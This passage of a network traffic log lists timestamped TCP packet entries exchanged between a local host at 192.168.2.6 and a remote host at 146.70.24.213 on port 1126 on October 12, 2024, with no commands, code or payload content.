Oct 12, 2024 20:30:06.252155066 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252160072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252207994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252237082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252274036 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252285957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252321005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252352953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252370119 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252387047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252389908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252419949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252454042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252465963 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252485991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252517939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252547026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252548933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252582073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252602100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252614975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252646923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252660990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252684116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252716064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252748013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252763987 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252777100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252799034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252808094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252841949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252872944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252892017 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252906084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252919912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252939939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252998114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.253190041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253618956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253652096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253674030 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.253685951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253719091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253742933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.253751040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253786087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253814936 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.253822088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253854036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253870964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.253890038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253921986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253936052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.253956079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.253988028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254009008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254021883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254065990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254230976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254282951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254334927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254365921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254379988 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254400969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254411936 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254451036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254484892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254504919 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254517078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254550934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254564047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254585028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254617929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254630089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254650116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254684925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254715919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254730940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254750013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254762888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254782915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254818916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254825115 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254851103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254885912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254916906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254931927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.254951000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.254962921 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.295128107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.295196056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.295212984 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.295233965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.295267105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.295300961 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.295301914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.295337915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.295367002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.295375109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.295430899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.295443058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.336009026 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.339901924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.339967966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.340003967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.340033054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.340038061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.340071917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.340106964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.340121031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.340142012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.340164900 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.340171099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.340492964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.342396975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.342451096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.342484951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.342516899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.342534065 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.342550993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.342575073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.342583895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.342618942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.342628002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.342647076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343046904 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343230009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343281984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343316078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343328953 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343349934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343401909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343405008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343461990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343507051 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343513012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343544960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343579054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343591928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343612909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343667030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343698978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343713045 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343744993 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343750000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343799114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343843937 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343864918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343914986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343946934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.343957901 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.343976974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344012976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344041109 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344047070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344088078 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344101906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344136953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344185114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344188929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344221115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344252110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344261885 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344285965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344317913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344352007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344366074 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344384909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344407082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344435930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344485998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344520092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344536066 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344549894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344573975 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344583988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344618082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344628096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344651937 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344691992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344724894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344738960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344762087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344778061 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344811916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344846010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344870090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344877005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344911098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344933033 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.344944954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344978094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.344995022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345010996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345042944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345074892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345088959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345108032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345119953 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345140934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345179081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345211029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345226049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345247030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345256090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345276117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345308065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345321894 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345344067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345372915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345388889 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345406055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345439911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345453978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345473051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345505953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345516920 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345541000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345612049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345772028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345870972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345900059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.345921993 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.345952034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346004963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346033096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346038103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346084118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346090078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346122026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346154928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346168995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346188068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346220970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346234083 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346255064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346287966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346321106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346334934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346354961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346363068 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346508980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346617937 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346618891 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346647024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346700907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346745968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346754074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346805096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346838951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346851110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346872091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346880913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.346904993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346936941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346965075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.346970081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.347008944 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.347017050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347050905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347084999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347106934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.347117901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347148895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347162008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.347183943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347215891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347248077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347265959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.347279072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347301960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.347327948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347361088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347373962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.347419024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347450018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.347462893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.387619019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.387665987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.387722969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.387729883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.387756109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.387763023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.387790918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.387824059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.387836933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.387857914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.387890100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.387902021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.429778099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.432594061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.432646990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.432683945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.432717085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.432753086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.432758093 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.432787895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.432796955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.432826042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.432848930 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.432856083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.435092926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.435235023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.435282946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.435338974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.435339928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.435375929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.435440063 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.435441017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.435481071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.435514927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.435540915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.435549974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436225891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436295986 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.436309099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436427116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436479092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436480999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.436531067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436570883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436582088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.436605930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436639071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436647892 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.436690092 CEST	1126	49710	146.70.24.213	192.168.2.6
